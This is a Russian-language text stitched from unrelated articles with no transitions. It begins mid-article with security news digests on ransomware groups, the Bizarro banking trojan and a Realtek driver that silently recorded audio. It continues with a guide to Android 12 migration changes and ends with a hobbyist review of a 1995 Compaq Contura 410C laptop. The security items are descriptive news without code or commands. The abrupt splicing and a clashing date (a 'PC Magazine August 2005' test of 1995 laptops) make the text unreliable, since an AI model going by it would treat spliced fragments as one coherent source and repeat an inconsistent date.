И это, конечно, очень странная история. Во-первых, об уязвимостях принято сообщать производителю, чтобы их чинили. Использовать их для своей выгоды удел представителей темной стороны. И то, что софт с уязвимостью лично вам по каким-то причинам не нравится это не аргумент для подобных действий. Во-вторых, это что получается с легитимным мессенджером будет распространяться эксплойт? Будем считать, что создатель Signal все же пошутил. Или нет? В любом случае, это интересный пример морального давления на идеологического противника, хотя и совершенно за пределами нормальной хакерской этики. В общем случае он говорит нам о том, что стоит задуматься о безопасности даже тех инструментов, которые используются далеко за линиями защиты корпоративной сети. Именно они при определенных обстоятельствах могут оказаться самым слабым звеном.

Что еще произошло

Исследование уязвимостей в охранных системах с печальным результатом: проблемы, обнаруженные компанией Eye Security, позволяют снять помещение с охраны удаленно. Подвержены более десяти тысяч инсталляций (в основном в Германии), пропатчена всего тысяча.

Взломана программа для хранения паролей Passwordstate, атакующие распространяли среди ее пользователей вредоносное ПО. Пострадали 29 тысяч клиентов. Схема классическая: скомпрометирован сервер обновлений, через него рассылался модифицированный исполняемый файл.

Найдена и закрыта тривиальная уязвимость в приложении для соцсети Clubhouse: основательница компании Luta Security Кэти Муссурис (Katie Moussouris) нашла способ оставаться в комнате, будучи невидимой для модераторов, без возможности бана. Атака работала для тех голосовых чатов, в которые злонамеренный пользователь был допущен ранее.

Утечки информации о еще не выпущенных ноутбуках компании Apple обычно не тема для новостей про инфобезопасность. Но на прошлой неделе такие данные распространились в сети в результате атаки на поставщика Apple, компании Quanta. Организаторы атаки оказывают давление на пострадавшую организацию (или на саму Apple), выкладывая в открытый доступ часть украденной информации.

Мейтейнер ядра Linux Грег Кроа-Хартман заблокировал все коммиты от сотрудников Университета штата Миннесота. Произошло это после публикации исследования, в ходе которого авторы (также сотрудники университета) пытались протащить в ядро Linux заведомо уязвимый код и оценивали способность определить наличие ошибок. Результат исследования (исходник в PDF): в 60% случаев кривой код принимался.

В конце апреля в блоге компании ERNW появилась интересная заметка о подозрительной активности на корпоративных лаптопах. Рабочий ноутбук передали специалистам компании с подозрением на что-то, очень напоминающее кибершпионаж. Предварительный анализ содержимого жесткого диска ничего интересного не выявил, следов вредоносной активности не обнаружили. А вот после запуска системы в логах нашлось нечто странное:



На скриншоте происходит следующее: аудиодрайвер смотрит, есть ли запись в реестре Windows, не находит ее и пишет на жесткий диск аудиофайл. Расследование обнаружило ошибку в драйвере для аудиочипа Realtek: он проверял наличие флага, включающего режим отладки (DebugFunction=1), но неверно отрабатывал ситуацию, когда запись в реестре отсутствовала, и начинал без ведома пользователя записывать звук с микрофона при любом обращении к себе (например, когда исследователь открывал настройки звука).

Безопасника, запросившего аудит, можно понять: куча записей с микрофона во временной директории Windows очень похожа на следы шпионской программы. До марта 2020 года такая активность аудиодрайвера могла пройти незамеченной. Но с переходом на удаленную работу на системный диск начали падать записи многих часов конференц-звонков. В некоторых случаях это даже приводило к переполнению накопителя. Что, видимо, и запустило расследование данного инцидента. Впрочем, странное поведение компьютера не всегда свидетельствует о вредоносной деятельности иногда это просто ошибка.

В блоге ERNW нет данных о распространенности этой проблемы. Указывается лишь конкретная версия драйвера со сбоем Realtek High Definition Audio Driver 6.0.1.8045. Разработчик допустил довольно распространенную ошибку: неверная работа драйвера была незаметна при отладке, когда необходимый ключ прописан в реестре. И еще: такую фичу штатного ПО легко адаптировать для действительно вредоносных действий.

Что еще произошло

Исследования Лаборатории Касперского. Первое о снижении абсолютного числа атак вымогателей-шифровальщиков на пользовательские ПК. Не стоит расслабляться: операторы явно переключились с широкого распространения вредоносного ПО на точечные выпады в адрес компаний. Второе отчет об активности APT-группировок в I квартале 2021 года.

Брайан Кребс пишет о дыре в API крупного американского бюро кредитных историй Experian. Долгое время к базе данных можно было обратиться без авторизации.

Криптовалюты убивают бесплатные инструменты непрерывной интеграции. В блоге компании LayerCI, поставщика подобного решения, описаны попытки абьюза систем, позволяющих выполнять собственный код на чужих ресурсах, для майнинга криптовалют.

Больше 4 млн почтовых адресов появились в базе сервиса Haveibeenpwned после разгрома ботнета Emotet. Такой нестандартный источник данных позволит уведомить пользователей, чьи пароли украли в результате заражения компьютера вредоносной программой.

12 мая эксперты Лаборатории Касперского опубликовали большой отчет об эволюции атак с шифрованием данных и последующим вымогательством. В статье прежде всего уделяется внимание организации этого криминального бизнеса и рассматриваются атаки на крупные компании. Одним из явных трендов года стала охота преступных группировок за крупной дичью сравнительно большими организациями, способными выплатить серьезный выкуп в цифровой валюте. Отчет публикуется на фоне ежедневных новостей об атаках на бизнес, включая такие громкие события, как атака на компанию Colonial Pipeline.

Самое важное, что нужно знать о таких группировках: они сложно устроены и не работают автономно. От этой угрозы не получится избавиться, даже если найти и арестовать организаторов отдельной кампании. Экосистема перестанет работать, только если лишится доходов, то есть когда пострадавшие перестанут платить выкуп. Исследование приводит примеры набора участников в новые организации и указывает типичные роли: продавцы учетных данных, разработчики вредоносного ПО, аналитики, ответственные за отмывание криптовалюты.

Самый актуальный миф, который опровергается в статье, это утверждение, что цели атак выбираются заранее. На самом деле их находят случайным образом. Чаще всего владельцы бот-сетей и брокеры, продающие доступ к скомпрометированным компьютерам и серверам, выставляют информацию о потенциальных жертвах, и цели определяются из наличия. Здесь есть важная рекомендация для IT-безопасников: нужно вовремя обнаруживать отдельные инциденты, связанные с проникновением в защищенный периметр или заражением вредоносным ПО. Между этим первым звонком и полномасштабной атакой возможен временной лаг, позволяющий избежать серьезных последствий.

Исследование в подробностях описывает деятельность двух крупных группировок вымогателей, REvil и Babuk. Помимо прочего, отмечается более агрессивное давление на потенциальных жертв, мотивирующее быстрее выплачивать выкуп. Для этого в даркнете создаются веб-сайты с примерами украденных данных, информация об утечках сливается в СМИ. И наоборот, для облегчения клиентского опыта улучшается поддержка жертв например, создается отдельный чат для общения с вымогателями. В предыдущей публикации экспертов Лаборатории Касперского по теме пользовательских вымогателей отмечается снижение количества широкомасштабных атак. Новый отчет показывает, куда переместилось внимание киберпреступников, и подробно описывает превращение криминальных операций в сложный и разветвленный бизнес.

Что еще произошло:
Атака на оператора нефтепровода Colonial Pipeline в США привела к кратковременному прекращению поставки нефтепродуктов на восточном побережье страны, вызвала панику на автозаправках и, судя по всему, в дальнейшем приведет к изменениям в мерах по борьбе с киберпреступностью. На прошлой неделе вышло много публикаций по этой атаке, но далеко не вся информация подтверждена. Вот наиболее интересные статьи:

Анализ деятельности группировки DarkSide, взявшей на себя ответственность за атаку, от Брайана Кребса (Brian Krebs). Ранее в Твиттере он то ли в шутку, то ли всерьез указывал на очевидный факт относительно вредоносных программ-шифровальщиков с русскоязычными корнями: они избегают системы с кириллической раскладкой.


Локализация отмечена и в отчете Лаборатории Касперского, но в ином контексте: русскоязычные организаторы атак стараются не работать с англоязычными партнерами, опасаясь контратак или утечки информации. Для теста на знание языка в одном примере предлагается использовать местный фольклор.

Разбор технических особенностей вредоносного ПО, используемого DarkSide в предыдущих атаках.

Неподтвержденная официально информация, согласно которой Colonial Pipeline заплатила вымогателям пять миллионов долларов. Здесь утверждается, что организаторы атаки потеряли доступ к своей инфраструктуре, а также к криптокошелькам.

Анализ движения средств в Bitcoin-кошельках, предположительно принадлежащих DarkSide.

Помимо этого инцидента ИБ-жизнь идет своим чередом. Большим событием стало исследование об уязвимостях в устройствах и самом протоколе Wi-Fi. Коллекция атак Fragattacks (сайт проекта, обсуждение на Хабре) использует уязвимости, не зависящие от типа шифрования (вплоть до WPA3), и может быть задействована для кражи данных или перенаправления пользователя на вредоносные ресурсы.

Исследователь из Швеции Понтус Джонсон (Pontus Johnson) нашел уязвимость в концепции универсальной машины Тьюринга, предложенной еще в 1967 году (статья The Register, исследовательская работа). В ходе этого исключительно теоретического упражнения был найден способ запуска произвольного кода. Причина: отсутствие валидации ввода.

Предложен способ передачи произвольных данных и получения информации с устройств на базе iOS и MacOS. Используется уязвимость протокола Bluetooth и особенности технологии Find My для поиска потерянных девайсов.

MSI предупреждает о поддельных сайтах, распространяющих вредоносное ПО под видом популярной утилиты Afterburner для разгона видеокарт.

Свежее исследование Лаборатории Касперского демонстрирует возможности банковского трояна Bizarro. Изначально атаковавшая пользователей в Бразилии, эта вредоносная программа недавно начала поддерживать и другие страны, включая Испанию, Францию, Португалию и Италию. Такое расширение операций требует от киберпреступников локализации как перевода обманных сообщений на другой язык, так и демонстрации поддельных веб-страниц, имитирующих дизайн сайтов местных банков. Как и в случае с атаками на бизнес, авторы Bizarro строят разветвленную организацию, нанимают сообщников для обналичивания украденных средств.



На скриншоте выше показан спам, рассылаемый потенциальным жертвам. Процесс заражения тривиальный: пользователей убеждают запустить инсталлятор, загружающий вредоносный код. Хостинг троянской программы осуществляется на взломанных блогах на платформе WordPress или на серверах Azure и AWS. Ключевой элемент атаки универсальный бэкдор не запускается, пока пользователь не откроет сайт банка из заданной базы. Хотя основные функции Bizarro направлены на кражу денег со счетов, у трояна есть и побочные увлечения, например подмена идентификаторов биткойн-кошельков в буфере обмена на принадлежащие злоумышленникам.

Как выглядит схема работы Bizarro:


Пользователя разными уловками заставляют перелогиниться в личном кабинете: принудительно закрывают браузер, отключают автозаполнение, чтобы логин и пароль пришлось вводить заново. Кейлоггер перехватывает и отправляет учетные данные на сервер злоумышленников, а пользователь видит поддельное окно для ввода кодов двухфакторной аутентификации. Код также проверяется, и в случае успеха на экран жертвы выводится сообщение об ошибке, блокирующее доступ к любым программам так злоумышленники пытаются выиграть время. Параллельно с этим производится попытка перевода денег со счета. Но этим возможности вредоносного ПО не ограничиваются. Помимо упомянутой слежки за буфером обмена и стандартного создания скриншотов, пользователю также могут предложить установку вредоносной программы на мобильный телефон, якобы для безопасности. Для этого на экран выводится QR-код, сгенерированный стандартным API Google:


Таким образом, Bizarro предлагает максимально автоматизированный механизм кражи данных с банковских счетов, но также дает возможность ручного управления бэкдором, вплоть до анализа конкретных файлов на жестком диске, запуска программ или кликов по заданным координатам. Bizarro далеко не единственная киберкриминальная кампания с бразильскими корнями, выходящая на мировой рынок. Всего Лаборатория Касперского задетектировала как минимум пять подобных операций. В прошлом году подробно разбирался троян Tetrade, схожий по функционалу, но реализованный иначе.

Что еще произошло

Исследование защищенности мобильных приложений с печальными результатами: компания Check Point обнаружила серьезные уязвимости в бэкенде популярных Android-приложений. Конкретные приложения не называют, но среди 23 проблемных почти половина имеет 10 и более миллионов пользователей. Два распространенных изъяна: уязвимая база данных и вшитые в код приложения ключи для доступа к серверам.

Исследователи продолжают поиск противоестественных методов эксплуатации тегов Apple AirTags с потенциальными проблемами для приватности. В свежем обзоре показан метод непрямой слежки по такому сценарию: подкладываем тег в дом жертвы и следим за его обнаружением. AirTag, переведенный в режим потери, сообщает не только свои координаты через чужой iPhone, но и время, прошедшее с последнего контакта. В данном случае локация тега известна, но время обнаружения помогает определить тот момент, когда жертва находится вне дома.

Pen Test Partners взломали систему развлечений на Boeing 747 (обсуждение на Хабре). Взлом провели на устаревшем и вышедшем из использования оборудовании под управлением Windows NT4. Интересный момент: современные инструменты для поиска уязвимостей уже не поддерживают настолько устаревшее ПО авторам исследования пришлось искать подходящие уязвимости вручную.

В журнале Wired опубликовали историю громкого взлома компании RSA 2011 года, который привел к компрометации ключей SecureID для двухфакторной аутентификации.

В майском наборе патчей для Android закрыли уязвимости нулевого дня в коде для работы с графической подсистемой. Ошибкам подвержены SOC Qualcomm и устройства с графикой Arm Mali.

Компания Microsoft прекратит поддержку браузера Internet Explorer в июне 2022 года.

Первоначальное заражение компьютеров, сделавшее возможной атаку на станцию водоочистки во Флориде в феврале этого года, произошло через зараженный веб-сайт.

Google анонсировал релиз Android 12 и уже выпустил две документации Developer preview. Изменений довольно много, поэтому мы решили рассказать вам о самых главных и интересных из них, которые затронут большую часть мобильных приложений. Но сперва расскажем о сложностях, с которыми вы можете столкнуться при миграции, и поделимся рекомендациями Google, как сделать переход на Android 12 приятным и безболезненным.



^{Оригинал: https://developer.android.com/about/versions/12/images/android-12-desktop-timeline-en-landpg-mar.svg}

Начиная с мая 2021 года планируются релизы нескольких Beta-версий нового Android 12, которые завершатся финальным релизом с новой функциональностью и улучшенным API. Последовательные этапы релиза содержат период Platform stability. Предполагается, что с наступлением этого этапа не будет изменений, способных повлиять на приложения. У разработчиков появится время для адаптации приложений, пока пользователи не получили новую платформу на устройства. Однако уже сейчас можно сделать первые выводы о новом API и о том, как эти обновления отразятся на наших приложениях.

Миграция на новую compileSdkVersion

1. Задержка показа уведомлений от Foreground service

Компонент Foreground service довольно часто фигурирует в новых обновлениях. Так, показ уведомления от компонента Foreground service будет отложен до 10 секунд. Это позволит компоненту foreground service с коротким сроком выполнения завершиться до показа уведомлений и уменьшить общее количество уведомлений у пользователей. Однако такая задержка может стать нежелательным поведением для многих приложений (например, если уведомление важное, и вы явно хотите его отобразить). В последнем случае придется вызвать метод setShowForegroundImmediately().
Уведомления будут показаны сразу, если ваш Foreground service попадает хотя бы под одно из исключений ниже:

• уведомление, связанное с компонентом Foreground service, содержит кнопку действия;
• Service связан с проигрыванием медиа, телефонными звонками или навигацией (задается в категории уведомлений);
• параметр foregroundServiceType имеет значение connectedDevice, mediaPlayback, mediaProjection или phoneCall.

2. Запрет использования низкоуровневого API при работе с MAC-адресами

В Android 12 при запросе MAC-адреса будет возвращаться null или заглушка:

• если значение параметра targetSdkVersion больше 30, то вернется null;
• если значение параметра targetSdkVersion меньше или равно 30, то вернется заглушка 02: 00: 00: 00: 00: 00.

При выполнении операций сетевого подключения следует использовать ConnectivityManager вместо низкоуровневого API (NetworkInterface, getifaddrs() или сокеты Netlink).

3. Сквозные касания через overlay блокируются

В Android сохранялась уязвимость с нажатием на системные окна с помощью прозрачного слоя. В Android 12 система блокирует обработку касания, которые проходят через определенные окна. Это ограничение включает следующие случаи:

• приложения, которые позволяют пропускать касания дальше через свои окна с помощью флага FLAG_NOT_TOUCHABLE;
• наложения, требующие разрешения SYSTEM_ALERT_WINDOW (окна, использующие флаг TYPE_APPLICATION_OVERLAY);
• сообщения типа Toast.

Исключения:

• взаимодействие внутри приложения (окна показываются только тогда, когда пользователь взаимодействует с одним приложением);
• взаимодействие с доверенными окнами Accessibility, IME, Assistant (окна с типом TYPE_APPLICATION_OVERLAY не являются доверенными);
• взаимодействие с окнами, чей корневой визуальный элемент имеет значение видимости INVISIBLE или GONE;
• взаимодействие с полностью прозрачными окнами (параметр alpha имеет значение 0.0);
• достаточно прозрачные окна системных предупреждений (если общая непрозрачность не превосходит определенного порогового значения).

4. Запрет закрытия системных диалоговых окон

Это ограничение также напрямую связано с безопасностью Android и является продолжением предыдущего ограничения. В Android 12 нельзя будет закрывать системные диалоги из приложений. При разных значениях параметра targetSdkVersion поведение будет отличаться:

• если приложение, ориентированное на Android 12, попытается закрыть системный диалог, то возникнет исключение SecurityException;
• если приложение со значением параметра targetSdkVersion до 30 включительно попытается закрыть системный диалог, то исключение SecurityException не возникнет. Неудачная попытка отразится записью в LogCat.

Закрывать системные диалоги в Android 12 можно будет только в трех исключительных случаях:

• при работе инструментальных тестов;
• при отображении приложением окна, находящегося в верхней части панели уведомлений (верно для приложений со значением параметра targetSdkVersion до 30 включительно);
• при взаимодействии пользователя с уведомлениями (посредством нажатия на кнопки действий в уведомлениях) и запущенными компонентами Service или Broadcast receiver, обрабатывающими эти взаимодействия с приложением (верно для приложений со значением параметра targetSdkVersion до 30 включительно).

Миграция на новую targetSdkVersion

1. Ограничение доступной области для уведомлений

До появления Android 12 приложения могли использовать всю область уведомлений для отображения информации пользователю. Отсутствие ограничений привело к неконсистентности внешнего вида уведомлений. В Android 12 появятся единые шаблоны уведомлений для свернутого и развернутого состояний.
Вид стандартного шаблона с Customizable Area:

^{Оригинал: https://developer.android.com/images/about/versions/12/customizable-area.png}

Новый шаблон уведомлений:


<sup>Оригинал: https://developer.android.com/images/about/versions/12/custom-collapsed-view.png


Оригинал: https://developer.android.com/images/about/versions/12/custom-expanded-view.png</sup>

Таким образом, уведомления не смогут использовать области произвольных размеров. Мы считаем это положительным обновлением, потому что системный UI должен быть унифицированным для всех приложений на разных устройствах, и нельзя разрешать каждому приложению показывать контент произвольных размеров.

2. Запрет использования трамплинов уведомлений

Когда пользователь взаимодействует с уведомлением, некоторые приложения в ответ на действия пользователя запускают компоненты, которые запускают Activity. Такие компоненты называют трамплины уведомлений(Notification trampoline).
В ответ на взаимодействие пользователя с уведомлением приложение не сможет запускать Activity из компонентов Service и BroadcastReceiver. Рекомендуется использовать уведомления с PendingIntent и запускать напрямую Activity.

3. Небезопасная работа с вложенным Intent

Это обновление повышает уровень безопасности мобильных приложений. Рассмотрим следующий сценарий с вложенным объектом Intent. Есть два приложения: ClientApp и ProviderApp. Приложение ClientApp запускает компонент из ProviderApp. Желаемым результатом является запуск из ProviderApp ClientCallbackActivity, принадлежащего ClientApp.


^{Оригинал: https://miro.medium.com/max/700/0*IEWopqfWI0gFMsnk}

Для этого ClientApp создает Intent (ClientCallbackIntent), который передастся сперва в ProviderApp через extra другого объекта Intent, а потом будет использован для запуска ClientCallbackActivity.
Такой паттерн поведения в Android является уязвимостью. У приведенного выше сценария есть две проблемы:

• чтобы приложение ProviderApp смогло запустить Activity ClientCallbackActivity, последнее должно быть помечено как exported. Но это позволит другим приложениям работать с ClientCallbackActivity;
• вложенный Intent может быть использован для запуска любого Activity из приложения ProviderApp, в том числе приватных, не экспортируемых и чувствительных к персональным данным Activity. Например, вместо ClientCallbackActivity Intent может ссылаться на ApiSensitiveActivity из приложения ProviderApp.

^{Оригинал: https://miro.medium.com/max/700/0*iof2-14vTyoDX-h5}

Решением этих проблем может служить PendingIntent: приложение ProviderApp будет принимать не просто Intent, а PendingIntent.


^{Оригинал: https://miro.medium.com/max/700/0*J1fPWozrWb-__b7u}

Проверка и предупреждение небезопасного запуска вложенных объектов Intent станут доступны в Android 12. В StrictMode добавлена специальная проверка. Если приложение сперва достает вложенный Intent, переданный в параметре extras, а затем осуществляет запуск другого компонента приложения с этим вложенным объектом Intent, то возникнет нарушение StrictMode. Чтобы включить эту проверку, необходимо вызвать метод detectUnsafeIntentLaunch() при конфигурировании VmPolicy. Рекомендуется использовать PendingIntent вместо вложенных объектов Intent.

4. Изменяемый PendingIntent

В приложениях с targetSdkVersion = 31 при создании PendingIntent без указания PendingIntent.FLAG_MUTABLE или PendingIntent.FLAG_IMMUTABLE флагов возникнет исключение IllegalArgumentException. Эти флаги определяют возможность модификации существующего объекта PendingIntent, например чтоб добавить в него что-то.
Это обновление нацелено на повышение безопасности Рекомендуется использовать флаг PendingIntent.FLAG_IMMUTABLE там, где это возможно.

5. Более безопасный экспорт компонентов

Переходим к возможно самому ожидаемому обновлению Android 12. Если у приложения с targetSdkVersion = 31 есть компоненты с непустыми блоками intent filter, то для каждого такого компонента должно быть явно указано значение атрибута android:exported.
Сделаем два шага назад и вспомним, что по умолчанию у всех компонентов без блоков intent filter android:exported = false, а у компонентов с блоками android:exported = true. Это сделано для того, чтобы к нему можно было обратиться извне приложения. Однако нужно ограничить приложения, которые могут получить доступ к компоненту. Если же этого сделано не будет, то это является уязвимостью CWE-926: Improper Export of Android Application Components.
Важно, что сама среда разработки Android Studio будет сообщать о компонентах без атрибута android:exported:

• в случае Android Studio 2020.3.1 Canary 11 в файле Manifest приложения будет сообщение о проблеме от анализатора Lint, а при попытке сборки будет появляться ошибка сборки;
• в случае более ранних версий Android Studio ошибка возникнет при попытке установить приложение на устройство с Android 12.

6. Современные SameSite cookie в WebView

Атрибут SameSite определяет, можно ли отправлять cookie со всеми запросами или только к тому же сайту. В приложениях, адаптированных к Android 12:

• cookie без атрибута SameSite обрабатываются как SameSite = Lax;
• cookie с SameSite = None должны иметь атрибут Secure (будут передаваться только по HTTPS);
• ссылки между HTTP и HTTPS обрабатываются как межсайтовые запросы, и cookie будут отправлять только в случае SameSite=None; Secure.

Рекомендуется убедиться, что атрибут SameSite явно задан с соответствующими значениями там, где это необходимо, и указать cookie, которым разрешено работать на веб-сайтах или при переходе с HTTP на HTTPS.

7. Ограничение запуска компонента Foreground service

Google с каждым релизом все настойчивее предлагает уходить от компонента Service к WorkManager. Так, приложения со значением параметра targetSdkVersion, равным 31, не смогут запускать Foreground service, если приложение в момент запуска работает в фоне.
Все еще есть ряд ограничений, которые позволят продолжить запускать из фона Foreground service. Например, после перезапуска устройства и получения приложением в компоненте Broadcast Reciever объекта Intent со значением поля action ACTION_BOOT_COMPLETED. Помимо этого, есть возможность попросить пользователя отключить оптимизацию заряда батареи, что позволит запускать Foreground service из фона.
Для задач, которые не попали под исключения, рекомендуется использовать новый тип задач Expedited jobs. Эти задачи могут запускаться мгновенно по мере возможности и не подвергаются таким ограничениям, как Battery Saver и Doze.

Дополнительные возможности новой платформы

Дополнительные возможности Android 12 не могут негативно повлиять на имеющиеся приложения. Во многом поэтому их интеграция не будет носить срочный характер, а зачастую потребует проведения анализа полезности тому или иному проекту.
Однако там тоже есть на что обратить внимание большинству мобильных команд:

• Rounded corner API позволяет упростить работу по UI с экранами со скругленными краями;
• при формировании действия в уведомлении появилась возможность указать флаг запроса аутентификации с помощью метода setAuthenticationRequired(). Переданное значение true обязывает Android в случае заблокированного устройства запросить у пользователя аутентификацию. Таким образом, действие, заданное для уведомления, будет выполнено только в случае, если пользователь корректно аутентифицировался;
• Compatible media transcoding: если ваше приложение не поддерживает новые форматы медиа, то Android сам перекодирует их в более старые форматы. В файле res/xml/media_capabilities нужно указать, какие форматы кодеков поддерживает ваше приложение, а какие нет. Это обновление поможет сделать ваше приложение стабильным в случае получения медиа в новом формате, к которому оно еще не готово;
• возвращаемые методами getLinkDownstreamBandwidthKbps() и getLinkUpstreamBandwidthKbps() оценки пропускной способности улучшены как для Wi-Fi, так и для сотовой связи. Методы будут возвращать средневзвешенные пропускные способности за все время для каждого оператора связи или SSID WiFi, типа сети и уровня сигнала среди всех приложений на устройстве. Ожидается повышение точности оценки при холодном старте приложения;
• 3rd-party-приложения могут скрывать перекрывающие их наложения типа TYPE_APPLICATION_OVERLAY с помощью метода setHideOverlayWindows();
• режим погружения упрощен: у пользователя появится возможность осуществлять навигацию одним жестом в полноэкранном режиме вместо двух (первое действие для возврата элементов навигации, а второе действие для выхода).

Большое количество улучшений касается также безопасности, UX, графики и изображений.

В комментариях интересно было бы услышать, какие изменения Вам кажутся важными и полезными, а что Вы ожидали получить, но все еще не получили?

До недавнего времени все портативные компьютеры в моей коллекции относились к поздней эпохе, имея на борту как минимум процессор Pentium MMX. Хотелось чего-то более древнего, но такие артефакты сложнее найти: речь идет об устройствах, которым минимум 25 лет. Чем дальше мы отправляемся в прошлое, тем дороже стоили ноутбуки, когда были новыми, тем меньше их покупали, а уж до наших времен дожили и вовсе немногие. Просто сохраниться до 2020 года, да еще в рабочем состоянии уже достижение. К сожалению, любимые мной ноутбуки IBM ThinkPad на 486-м процессоре сейчас совсем трудно найти, но они были не единственные. Недавно мне попался недорогой артефакт из 1995 года, ноутбук Compaq Contura 410C. На сегодняшний день это самый древний лаптоп в моей коллекции.



Хотя подождите, в 1995 году уже два года как была доступны процессоры Pentium. Как так вышло, что в ноутбуках 486-й процессор задержался? Ну, во-первых времена были, по сравнению с нынешними, неторопливые. Во-вторых, в начале 95-го Intel только анонсировала мобильные версии Pentium с частотой от 75 мегагерц с рабочим напряжением 2.9 вольта. В августе 2005 года журнал PC Magazine проводит большой тест сотни лаптопов, из которых четверть имеют на борту Pentium 75, 90 или 100. Все это десктопные версии процессора в переносном корпусе, с крайне небольшим временем автономной работы.

Между тем, 486-го процессора в те времена было более чем достаточно для всех задач, особенно если не увлекаться играми. В моем новом-старом Compaq Contura это и не получится. Ладно звуковой карты нет при желании это поправимо. Я впервые встретился с настоящим цветным дисплеем, сделанным по технологии DSTN. Осознал на практике весь тот уровень страданий, с которым четверть века назад сталкивались владельцы таких портативных компьютеров. Но выбора особо не было: TFT-матрицы были совершенно недоступны большинству людей, если покупать за свои.

Дневник коллекционера старых железок я веду в Телеграмме.



В том же номере PC Magazine за август 2005 года есть реклама ноутбуков Compaq, наглядно показывающая отличия в цене. Ноутбуки серии Contura выпускались с 1992 года, в первых устройствах использовались процессоры Intel 80386SL, первые настоящие мобильные CPU с функциями энергосбережения. С 1994 года выпускается очень интересная серия Contura Aero это по сути дальние родственники нетбуков из конца нулевых, очень компактные модели с низкой ценой. Ноутбук Contura 410C стоит 2100 долларов, и по современным меркам это недешево. Тем более недешево, если учесть инфляцию, в современных деньгах получится $3600. И это модель с экраном Dual Scan. Настоящий TFT с быстрым откликом и высокой контрастностью в этой рекламе представлен топовым ноутбуком Compaq LTE Elite. Его спецификации похожи на Compaq Contura 420C (старшая модель с процессором на 75 Мгц), но стоит он на 1700 долларов дороже. Немалая доля этой наценки происходит из-за экрана. Судя по всему в 1995 году именно дисплей был главным апгрейдом, а не процессор или память.



Выше реклама 410С до уценки, из журнала за май 1995 года. По ней можно определить основные спецификации: процессор 486DX2-50, 4 мегабайта оперативной памяти (максимум 20), 9,5-дюймовый цветной дисплей, жесткий диск на 350 мегабайт, вес 2,7 килограмма. Установлены DOS и Windows 3.1, для передачи данных имеется 3,5-дюймовый дисковод. Модели со встроенным CD-ROM в 1995 году есть, но еще не являются мейнстримом.



Прошедшие 25 лет на моем ноутбуке почти не сказались. Слегка ослабли петли, на крышке дисплея некритичная трещина, отсутствует аккумулятор. В какой-то момент базовую конфигурацию прокачали: памяти стало 8 мегабайт, объем жесткого диска вырос до 800 МБ.



На ноутбук установлена Windows 95, и для нее это вполне рабочая конфигурация: достаточно добавить какой-нибудь соответствующий эпохе Microsoft Office, и можно трудиться на благо общества в экселе. Он здесь и установлен, в наследство от предыдущего владельца, почему-то версии 2000. А вот она для такой системы тяжеловата, хоть и работает.



Слева расположены два слота PCMCIA и дисковод. Справа только замок Kensington. Милая деталь: встроенные упоры позволяют установить ноутбук на столе под углом, для более комфортной работы. Они не обязательные, так как у данной модели есть полноценный палмрест. С трекболом!



Удобство работы с трекболом зависит, по большом счету, от размера шарика, здесь он достаточно крупный. Пришлось привыкать к нестандартному расположению кнопок: над трекболом левая кнопка, под ним правая. Все это вполне пригодно к эксплуатации, пока не надо что-то перетащить при нажатой кнопке мыши. Клавиатура тоже удобная, правда расположить большую и легко нажимаемую кнопку выключения прямо над клавишей Escape было плохой идеей.



Сзади стандартный набор портов: VGA, комбинированный PS/2 для клавиатуры и мыши, последовательный и параллельный. Проприетарный разъем, отдаленно напоминающий DVI, предназначен для подключения к док-станции. Она здесь не такая крутая, как у более дорогого LTE Elite, но удобная.



Предполагалось, что прямо на док-станцию можно поставить монитор, и в условиях офиса ноутбук бы ничем не отличался от десктопа. Ноутбук в эту конструкцию вставлялся как дискета в дисковод, с механическим выбросом из слота.

Производительность
У меня был еще один повод приобрести именно такой ноутбук в коллекцию. Год назад я прокачал свой 386-й десктоп, установив в него процессор TI 486 SXL2-50. Это особая версия 80486, с 8 килобайтами кэш-памяти, предназначенная для установки в 386-е матплаты, способная работать с сопроцессором 80387, а своего блока вычислений FPU не имеющая. Частота у нее такая же: 50 мегагерц, и так же используется удвоение частоты системной шины. Но в Compaq Contura установлен настоящий 80486, а значит можно сравнить эти процессоры в лоб. Давайте попробуем:



Старый и надежный Checkit показал результат в 22554 балла в целочисленных вычислениях и 7755 балла в вычислениях с плавающей точкой. FPU, работающий на частоте 50 Мгц оказался ожидаемо в два раза быстрее внешнего сопроцессора 80387, работающего на 25 Мгц (там было 3598 баллов). А вот результат с целочисленными вычислениями на настоящем 486DX2-50 всего на 8% больше, чем у поддельного TI SXL2.



А вот Speedsys показал куда более серьезный прирост: 18.09 балла по сравнению с 7.81. Больше, чем в два раза. Это примерно соответствует результатам, полученным на десктопных процессорах в большом тесте на Vogons. Помимо процессора важным апгрейдом в этом ноутбуке (по сравнению с моим десктопом) является интегрированное видео, подключенное по интерфейсу VLB, поэтому финальный тест в Doom. В режиме на полный экран он показал 17,17 fps против 10,39 на псевдо-486, что отчасти является заслугой как раз более производительной графической системы. То есть на 486DX2 первый Doom наконец-то становится играбельным, ну, по меркам середины девяностых.

Жуткий экран
Лучше показать этот дисплей в деле, чтобы сразу было понятно:



До этого я имел опыт с бюджетными дисплеями с ноутбуком ThinkPad 380E 1997 года. Но там установлена матрица FRSTN, где FR расшифровывается как Fast Response. У нее настолько же отвратительный контраст и углы обзора, но хотя бы скорость обновления картинки приемлемая. В Compaq Contura бюджетный ЖК-экран девяностых представлен во всей красе. Именно для них в Windows 95 придумали фичу, оставляющую шлейф после курсора мыши. Иначе при быстром движении он просто исчезает с экрана. На таком экране нельзя играть в игры, лучше сразу подключить внешний дисплей. Ну или ограничиться текстовыми квестами, вполне себе вариант.



Вот такое получилось не идеальное ретро. Ноутбук с правильным разрешением 640x480, отображающий DOS-программы без масштабирования, но с ужасным качеством картинки, и без звуковой карты. Офисный инструмент 1995 года, но для очень ценных сотрудников. Если будете искать модель из 400-й серии, желательно найти ноутбук 4x0CX он как раз будет оснащен активной матрицей. Как и ThinkPad 380E этот ноутбук станет музейным экспонатом в моей коллекции: хочется приставить его к делу, но экран не позволяет. На очереди самый дорогой представитель модельного ряда Compaq 1994 года модель LTE Elite, для которой потребуется довольно трудоемкое восстановление.

Если вы, как я, коллекционируете древние компьютеры, при выборе очередного экспоната вас прежде всего интересуют две вещи: состояние и комплектация. Железку с треснувшим корпусом будет сложно починить, но ноутбук с базовой конфигурацией вполне можно прокачать до максимально возможной. Так я поступил в прошлом году с ноутбуком ThinkPad X201: поменял в нем почти все, включая материнскую плату и экран.


